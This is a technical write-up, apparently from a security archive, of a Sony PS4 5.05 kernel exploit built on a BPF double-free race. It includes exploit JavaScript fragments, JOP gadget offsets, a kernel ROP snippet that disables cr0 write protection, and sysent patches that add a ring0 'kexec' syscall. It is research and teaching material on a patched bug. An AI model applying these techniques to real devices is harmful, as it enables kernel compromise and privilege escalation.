Sony Playstation 4 5.05 BPF Double Free

Sony Playstation 4 version 5.05 BPF double-free kernel exploit whitepaper.

MD5 | 211837c5b7a80994fc356f4c3f44eb56

**Note: Similar to 4.55, this bug is interesting primarily for exploitation on the PS4, but it can also be used on other systems using the Berkely Packet Filter VM if the attacker has sufficient permissions, so it's been published under the "FreeBSD" folder.**

**If you found any mistakes or have suggestions to improve clarity on some points, either open an issue on this repo or reply them to [this tweet]( Thanks :)**
# Introduction
Welcome to the 5.0x kernel exploit write-up. A few months ago, a kernel vulnerability was discovered by [qwertyoruiopz]( and an exploit was released for BPF which involved crafting an out-of-bounds (OOB) write via use-after-free (UAF) due to the lack of proper locking. It was a fun bug, and a very trivial exploit. Sony then removed the write functionality from BPF, so that exploit was patched. However, the core issue still remained (being the lack of locking). A very similar race condition still exists in BPF past 4.55, which we will go into detail below on. The full source of the exploit can be found [here](

<p align="center">
<img src="">

This bug is no longer accessible however past 5.05 firmware, because the BPF driver has finally been blocked from unprivileged processes - WebKit can no longer open it.

Sony also introduced a new security mitigation in 5.0x firmwares to prevent the stack pointer from pointing into user space, however we'll go more in detail on this a bit further down.

### Assumptions
Some assumptions are made of the reader's knowledge for the writeup. The avid reader should have a basic understanding of how memory allocators work - more specifically, how malloc() and free() allocate and deallocate memory respectively. They should also be aware that devices can be issued commands **concurrently**, as in, one command could be received while another one is being processed via threading. An understanding of C, x86, and exploitation basics is also very helpful, though not necessarily required.

# Background
This section contains some helpful information to those newer to exploitation, or are unfamiliar with device drivers, or various exploit techniques such as heap spraying and race conditions. Feel free to skip to the "A Tale of Two Free()'s" section if you're already familiar with this material.

### What Are Drivers?
There are a few ways that applications can directly communicate with the operating system. One of which is system calls, which there are over 600 of in the PS4 kernel, ~500 of which are FreeBSD - the rest are Sony-implemented. Another method is through something called "Device Drivers". Drivers are typically used to bridge the gap between software and hardware devices (usb drives, keyboard/mouse, webcams, etc) - though they can also be used just for software purposes.

There are a few operations that a userland application can perform on a driver (if it has sufficient permissions) to interface with it after opening it. In some instances, one can read from it, write to it, or in some cases, issue more complex commands to it via the `ioctl()` system call. The handlers for these commands are implemented in **kernel** space - this is important, because any bugs that could be exploited in an ioctl handler can be used as a privilege escalation straight to ring0 - typically the most privileged state.

Drivers are often the more weaker points of an operating system for attackers, because sometimes these drivers are written by developers who don't understand how the kernel works, or the drivers are older and thus not wise to newer attack methods.

### The BPF Device Driver
If we take a look around inside of WebKit's sandbox, we'll find a `/dev` directory. While this may seem like the root device driver path, it's a lie. Many of the drivers that the PS4 has are not exposed to this directory, but rather only ones that are needed for WebKit's operation (for the most part). For some reason though, BPF (aka. the "Berkely Packet Filter") device is not only exposed to WebKit's sandbox - it also has the privileges to open the device as R/W. This is very odd, because on most systems this driver is root-only (and for good reason). If you want to read more into this, refer to my previous write-up with 4.55FW.

### What Are Packet Filters?
Below is an excerpt from the 4.55 bpfwrite writeup.

Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are parsed by `bpf_filter()` (which are ran when packets are received). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside it's buffer. Breaking down the BPF VM in it's entirety is far beyond the scope of this write-up, just know that the code produced by it is ran in kernel mode - this is why read/write access to `/dev/bpf` should be privileged.

You can reference the opcodes that the BPF VM takes [here](

### Race Conditions
Race conditions occur when two processes/threads try to access a shared resource at the same time without mutual exclusion. The problem was ultimately solved by introducing concepts such as the "mutex" or "lock". The idea is when one thread/process tries to access a resource, it will first acquire a lock, access it, then unlock it once it's finished. If another thread/process tries to access it while the other has the lock, it will wait until the other thread is finished. This works fairly well - when it's used properly.

Locking is hard to get right, especially when you try to implement fine-grained locking for performance. One single instruction or line of code outside the locking window could introduce a race condition. Not all race conditions are exploitable, but some are (such as this one) - and they can give an attacker very powerful bugs to work with.

### Heap Spraying
The process of heap spraying is fairly simple - allocate a bunch of memory and fill it with controlled data in a loop and pray your allocation doesn't get stolen from underneath you. It's a very useful technique when exploiting something such as a use-after-free(), as you can use it to get controlled data into your target object's backing memory.

By extension, it's useful to do this for a double free() as well, because once we have a stale reference, we can use a heap spray to control the data. Since the object will be marked "free" - the allocator will eventually provide us with control over this memory, even though something else is still using it. That is, unless, something else has already stolen the pointer from you and corrupts it - then you'll likely get a system crash, and that's no fun. This is one factor that adds to the variance of exploits, and typically, the smaller the object, the more likely this is to happen.

# A Tale of Two Free()'s
Via `ioctl()` command, a user can set a filter program on a given descriptor via commands such as `BIOSETWF`. There are other commands to set other filters, however the write filter is the only one interesting to us for this writeup. An important part of the previous exploit was the power to free() an older filter once a new one has been allocated, via `bpf_setf()`, which is called directly by `BIOSETWF`'s command handler. This allowed us to free() a filter while it was in use. This free() in itself is also a bug that can be exploited, and is leveraged in the newer exploit. Let's take a look at `bpf_setf()` again.

static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd)
struct bpf_insn *fcode, *old;

// ...

if (cmd == BIOCSETWF) {
old = d->bd_wfilter; // <----- THIS ISN'T LOCKED :)
wfilter = 1;

// ...
if (fp->bf_insns == NULL) {
// ...


// ...


if (old != NULL)
free((caddr_t)old, M_BPF);

return (0);

// ...

We can see that there are variables on the stack to hold filter pointers, including one for the `old` filter which eventually gets free()'d. If the ioctl command is set to `BIOSETWF`, the pointer from `d->bd_wfilter` is copied to the `old` stack variable.

Later on, we can see that they lock the BPF descriptor, and null the references to the filters. They lock the reference clearing, but what about the pointer of `d->bd_wfilter` being copied to the stack? As we've seen in previous exploits, multiple threads can run and use the same `bpf_d` object. If we were to race setting two filters in parallel, there's a chance that both threads will copy the same pointer to their kernel stacks, eventually resulting in a double free as both pointers will be processed.

![demonstration gif](

# Poisoning the Allocator
With a double free() primitive, we have the ability to achieve memory corruption on the kernel heap by poisoning the memory allocator. This essentially allows us to create a targetted use-after-free() (UAF) on an object allocated post-corruption.

# Corrupting knotes
### Summary
Similar to 1.76, the target object for this exploit that was used was the `knote` object. `kqueue` objects represent event queues for raising these events. `knote` lists are managed by the `kqueue` they are in. The `knote` object is used to represent a kernel event in memory, and are linked together by a singly linked list. Qwerty chose `knote` because of knote lists (called `knlist`), as it gives us some degree of control of the size. Let's take a look at the structure (macros have been ommited for brevity sake).

struct knote {
SLIST_ENTRY(knote) kn_link; /* for kq */
SLIST_ENTRY(knote) kn_selnext; /* for struct selinfo */

struct knlist *kn_knlist; /* f_attach populated */
TAILQ_ENTRY(knote) kn_tqe;
struct kqueue *kn_kq; /* which queue we are on */
struct kevent kn_kevent;
int kn_status; /* protected by kq lock */
int kn_sfflags; /* saved filter flags */
intptr_t kn_sdata; /* saved data field */

union {
struct file *p_fp; /* file data pointer */
struct proc *p_proc; /* proc pointer */
struct aiocblist *p_aio; /* AIO job pointer */
struct aioliojob *p_lio; /* LIO job pointer */
} kn_ptr;

struct filterops *kn_fop; // <--- Of interest as an attacker, offset: 0x68
void *kn_hook;
int kn_hookid;

There's an interesting field there, `struct filterops *kn_fop` at offset 0x68. This is essentially a table of function pointers that is referenced when something happens with the event, such as an attach or detach. The `f_detach` function pointer will be dereferenced and called when the `kqueue` and by extension the `knote` is being destroyed.

struct filterops {
int f_isfd;
int (*f_attach)(struct knote *kn);
void (*f_detach)(struct knote *kn);
int (*f_event)(struct knote *kn, long hint);
void (*f_touch)(struct knote *kn, struct kevent *kev, u_long type);
By corrupting the `f_detach` function pointer, hijacking of the instruction pointer and thus arbitrary code execution can be achieved when the object is destroyed via the destruction of the corrupted `kqueue`.

### Exploit Overview
Our exploit strategy is targetting a UAF on the `knote` object to hijack the instruction pointer. Let's break down the steps/stages for successful exploitation.

1) Open BPF descriptors, setup one NOP filter and one filter for heap spraying
2) Setup the fake `knote` object in WebKit's heap for JOP.
3) Setup the kernel ROP chain
4) Start thread one
5) Start thread two

Thread 1 will do the following actions:
1) Create a kqueue via `sys_kqueue()`
2) Set a filter on the device in an attempt to poison the allocator
3) Trigger a kevent
4) Perform a heap spray in an attempt to achieve memory corruption
5) Close the kqueue (attempt to achieve code execution)

Thread 2 will simply continously attempt to set a write filter.

# A poor mans SMAP
At some point in 5.0x, it seems Sony added some mitigation into the scheduler to check the stack pointer against userland addresses when running in kernel context, similar to the increasingly common "Supervisor Mode Access Prevention" (SMAP) mitigation found on modern systems. This turned an otherwise fairly trivial exploit into some complex kernel memory manipulation to run a kernel ROP (kROP) chain. To my knowledge this hasn't been investigated very much, but attempting a simple stack pivot like we've done in previous exploits into userland memory will crash the kernel.

To avoid this, we need to get our ROP chain into kernel memory. To do this, qwerty decided to go with the method he used on the iPhone 7 - essentially using JOP to push a bunch of stack frames onto the kernel stack, and `memcpy()`'ing the chain into `RSP`.

You can find a detailed annotation of the exploit [here]( to assist in understanding it, as it does get quite complex.
# JOP Explained
Software engineers have started getting wise to stack pivot techniques, and preventing the attacker from the ability to stack pivot into user-controlled memory is a pretty decent counter-measure, however, like everything, it is bypassable. JOP (jump oriented programming) is a way. You could use JOP to implement a full chain, or use it as a method of getting to ROP via getting your ROP chain into kernel memory. The latter is preferred, because implementing logic in JOP (while possible) can be a nightmare.

### ROP vs. JOP
Return Oriented Programming (ROP) is essentially the process of creating a fake stack and pushing the address of gadgets to it, and pivotting RSP to it. Your chain of gadgets is then executed like a real callstack, and every time the `ret` instruction is hit, the next gadget in the chain is run.

Jump Oriented Programming (JOP) works a bit differently. Instead of ending your gadgets with a `ret` instruction, you end your gadgets with a `jmp` instruction. As long as you control the destination (maybe there's a register you can influence the value of), you can chain it with other gadgets, without the need of using a fake stack. For instance, if you control the value of `rax`, your gadget can end with `jmp rax`. By setting the value of `rax` to the address of the next gadget, you can chain them.

With JOP you generally have to get more creative, because you're even more limited on potential gadgets - this is why implementing full chains in JOP is not preferred.


# Faking a knote
Now that we've covered the basics of what the exploit is and the basics of JOP, we'll start through the process of exploiting the bug. The first thing we need to do is setup a fake `knote` object to spray the heap with. Luckily, faking this object is easy, there's no need to fake a bunch of members for stability, we only need to fake a few members along with `kn_fops`, our target object. The `ctxp` buffer is used to setup our fake `knote`.

var ctxp = p.malloc32(0x2000); // ctxp = knote
p.write8(ctxp.add32(0), ctxp2); // 0x00 = kn_link - not important for kqueue per se, but for the JOP gadget
p.write8(ctxp.add32(0x50), 0); // 0x50 = kn_status = 0 (clear flags so detach is called)
p.write8(ctxp.add32(0x68), ctxp1); // 0x68 = kn_fops

Notice that we've set `kn_fops` to `ctxp1` - this is the buffer for the fake `kn_fops` function table. The only thing we need to fake in this table is `kn_fops->f_detach()`, because this is the only function that will be called on kqueue destruction.

var ctxp1 = p.malloc32(0x2000); // ctxp1 = knote->kn_fops
p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // JOP gadget

As you can see, this is where we achieve arbitrary code execution, and we're directing RIP to `0x12A19CD` in WebKit. Here's an x86 snippet of the relevant code for `kqueue_close()` - where control of the instruction pointer is achieved.

; Note: R14 = ctxp
seg000:FFFFFFFF89D29861 test byte ptr [r14+50h], 8 ; we set ctxp+0x50 to 0, so we're good
seg000:FFFFFFFF89D29866 jnz short loc_FFFFFFFF89D29872 ; irrelevant
seg000:FFFFFFFF89D29868 mov rax, [r14+68h] ; r14 + 0x68 = ctxp1
seg000:FFFFFFFF89D2986C mov rdi, r14 ; r14 + 0x00 = ctxp2 = rdi
seg000:FFFFFFFF89D2986F call qword ptr [rax+10h] ; JOP gadget

Also notice that we control the `rdi` register here via the `r14` register. Under normal circumstances, the knote object `kn` is loaded into `rdi` as it's the first argument to `kn->kn_fop->f_detach()` - however because we have corruption on the `knote` - we can not only control where we jump to, but also the arguments. This is important for JOP, because the next jump in the first JOP gadget requires us to have control of the RDI register.

# Code Execution
### Creating space on the kstack
To push some space on the stack, we can use a JOP chain. We'll use the variable `stackshift_from_retaddr` to track how much we've pushed on the stack. First we'll run a function prologue, which will subtract from RSP, creating space for us to put our ROP chain into. This function prologue is our first JOP gadget at `0x12A19CD`, which we setup previously in our fake `knote` that we sprayed.

seg000:00000000012A19CD sub rsp, 58h
seg000:00000000012A19D1 mov [rbp-2Ch], edx
seg000:00000000012A19D4 mov r13, rdi
seg000:00000000012A19D7 mov r15, rsi
seg000:00000000012A19DA mov rax, [r13+0]
seg000:00000000012A19DE call qword ptr [rax+7D0h] // Implicitly subs 0x8 from rsp

At this point, we're 0x5C away from the original stack pointer. Now remember, for JOP to work, we need to be able to control where code jumps next, which means we have to control `rax`. Luckily, we can see `rax` is loaded from `r13+0`, and `r13` is set from `rdi`. As detailed above, we have corruption on `rdi` via the `knote` object. If we look at the previous section where the JOP gadget is called from the kernel, we set `rdi` to be `ctxp2`. The next gadget will be called at `ctxp2 + 0x7D0`, which we will set to `0x6EF4E5`.

p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5));
seg000:00000000006EF4E5 mov rdi, [rdi+10h]
seg000:00000000006EF4E9 jmp qword ptr [rax]

This gadget will allow us to set `rdi` to a new value, and jump to `rax`, which is still equivalent to the address of `ctxp2`. Notice that this gadget allows us to loop, because we can write the first gadget to `ctxp2`, and set where the first gadget jumps to via `rdi + 0x10`.

var iterbase = ctxp2;

for (var i = 0; i < 0xf; i++) { // loop 15 times
p.write8(iterbase, offsetToWebKit(0x12A19CD)); // first JOP gadget
stackshift_from_retaddr += 8
p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // second JOP gadget
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
iterbase = iterbase.add32(0x20); // setup next loop

### Preparing memcpy call
#### Fundamentals
Now that we've created space on the stack, we want to copy our kernel ROP chain into it to get executed. Let's take a look at memcpy()'s function signature:

void *memcpy(void *destination, const void *source, size_t num);

As defined in the x64 ABI (Application Binary Interface) - the following registers are used to pass arguments to functions:

rdi - first argument
rsi - second argument
rdx - third argument
rcx - fourth argument
r8 - fifth argument
r9 - sixth argument
[stack] - seven+ arguments

Therefore, the following registers are interesting to us for this memcpy call:

rdi (memory destination pointer)
rsi (memory source pointer)
rdx (size in bytes)

#### Setting Size
The first thing we'll do is load RDX for the size. We can do this via another JOP gadget in WebKit at `0x15CA41B`.

seg000:00000000015CA41B mov rdx, [rdi+0B0h]
seg000:00000000015CA422 call qword ptr [rdi+70h]

We can write relative to RDI via the `rdibase` variable. By adding our shift plus 0x28 (offset for where we're writing on the stack), we can load RDX with our chain length.

#### Setting Source
Next we'll load the source pointer in RSI. We want this to point to where we're writing our kernel ROP chain in userland. Similar to when we set the size, we'll again look for a JOP gadget that can set RSI from memory relative to RDI. WebKit at `0x1284834` does the trick.

seg000:0000000001284834 mov rsi, [rdi+8]
seg000:0000000001284838 mov rdi, [rdi+18h]
seg000:000000000128483C mov rax, [rdi]
seg000:000000000128483F call qword ptr [rax+30h]

#### Setting Destination
Finally, we need to setup RDI so that it points to all of our fake stack frames that we pushed on the kernel stack. This turns out to be at RBP (base pointer) - 0x28. We can use another JOP gadget at `0x272961`.

seg000:0000000000272961 lea rdi, [rbp-28h]
seg000:0000000000272965 call qword ptr [rax+40h]

#### Calling Memcpy
Now that the arguments are setup, we need to call `memcpy()`. Notice from our last JOP gadget, that the next place we jump to is setup based on `[rax + 0x40]`. This is where we want to write the address of `memcpy()` from userland. We'll skip the function prologue and optimizations to avoid side-effects produced from our previous JOP gadgets.

p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90)); // skip prolog covering side effecting branch and skipping optimizations
var topofchain = stackshift_from_retaddr + 0x28;
p.write8(rdibase.add32(0xB0), topofchain);

# Exploit Debugging (Kind Of)
### Summary
It was suggested to me that I should include a section containing some details on complications that occured. We've already detailed one of them, being the SMAP-like implementation, however another was the lack of debugging. At this point in time, we didn't have a kernel debugging framework setup for working with the PS4. We did however have the ability to patch the kernel to enable UART and "verbose panic" information if we have an existing kernel exploit working. Of course though, once the system reboots, we no longer have access to UART nor verbose panic info even if we did.

### Fatal Traps
Panic information that's printed to the klog/UART can be a very helpful tool for debugging exploits (which is probably why Sony has it disabled in the first place). Below is an example of a standard page fault panic from klog:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 01
fault virtual address = 0xffffde1704254000
fault code = supervisor read instruction, protection violation
instruction pointer = 0x20:0xffffde1704254000
stack pointer = 0x28:0xffffff807119b220
frame pointer = 0x28:0xffffff807119b2b0
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, long 1, def32 0, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 87 (infloopThr)

As you can see, some information here is extremely useful, especially the virtual address and the instruction pointer.

### Complications
This information is fantastic when the system actually gives it to us. However, there are some cases where the system won't. Often this seems to be because the crash happens in a *critical section*, such as inside free() directly. For more information on critical sections, see [Critical Sections](

Other times, the reason we don't get this information is unknown. If the panic information is unobtainable for us because we either don't have an existing exploit or the information just won't get printed to the klog, other tricks must be used, such as using infloop gadgets and other "hacky" exploit debugging techniques.

# Patching the Kernel
### Disabling Write Protection
Now that we have the ability to run kernel ROP chains due to our stack manipulation sorcery described in the last section, we can apply kernel patches after we disable kernel write protection via the `cr0` register. We can do this by just flipping the write-protection bit at bit 16.

![cr0 table](

krop.push(window.gadgets["pop rsi"]);
krop.push(new int64(0xFFFEFFFF, 0xFFFFFFFF)); // Flip WP bit
krop.push(window.gadgets["and rax, rsi"]);
krop.push(window.gadgets["mov rdx, rax"]);

### Installing a Syscall (Kexec)
For brevity's sake, I won't cover all the patches in detail, however here's a brief recap of the patches made in the ROP chain.

sys_setuid syscall - remove permission check
sys_mmap syscall - allow RWX mapping
amd64_syscall - syscall instruction allowed anywhere
sys_dynlib_dlsym syscall - allow dynamic resolving from anywhere

The main goal of the chain is to install our own system call called `kexec`. This will allow us to execute arbitrary code in kernel mode easily from any application, no matter the privileges.

sys_kexec(void *code, void *uap);

Code such as jailbreaking and HEN are ran via `kexec`. Installing it is fairly easy, we just have to add an entry into sysent.

struct sysent { /* system call table */
int sy_narg; /* number of arguments */
sy_call_t *sy_call; /* implementing function */
au_event_t sy_auevent; /* audit event associated with syscall */
systrace_args_func_t sy_systrace_args_func;
/* optional argument conversion function. */
u_int32_t sy_entry; /* DTrace entry ID for systrace. */
u_int32_t sy_return; /* DTrace return ID for systrace. */
u_int32_t sy_flags; /* General flags for system calls. */
u_int32_t sy_thrcnt;

By setting `sy_call` to a `jmp qword ptr [rsi]` gadget (which can be found in the kernel at offset `0x13460`), `sy_narg` to `2`, and `sy_flags` to `SY_THR_STATIC` (`100000000`), we can successfully insert a custom system call that executes code in ring0.

seg000:FFFFFFFF8AC38820 dq 2 ; Syscall #11
seg000:FFFFFFFF8AC38828 dq 0FFFFFFFF89BCF460h
seg000:FFFFFFFF8AC38830 dq 0
seg000:FFFFFFFF8AC38838 dq 0
seg000:FFFFFFFF8AC38840 dq 0
seg000:FFFFFFFF8AC38848 dq 100000000h

# Sony Patch
Again, not a real patch, but a Sony patch - though this time more effective. Opening BPF has been blocked for unprivileged processes such as WebKit and other apps/games. It's still present in the sandbox, however attempting to open it will fail and yield EPERM.

# Conclusion
Another cool bug to exploit. It should have been a trivial exploit, however Sony's new mitigation that prevents exploit devs from pivotting RSP into userland memory while in kernel context is quite effective, and some tricks had to be used to get the chain into kernel memory - but as demonstrated, it is beatable. This exploit is also a good example of how double free()'s can be exploited fairly easily on FreeBSD if they're on an object of decent size.

# Credits


# Additional Thanks
[TheFloW]( - Suggestions and Feedback

# References
[qwertyoruiopz : Detailed Annotation](

[qwertyoruiopz : Zero2Ring0 Slides](

[Watson FreeBSD Kernel Cross Reference](

[Marco Ramilli : From ROP to JOP](

[Wikipedia : Control register (cr0)](

[Wikipedia : Critical section](

Related Posts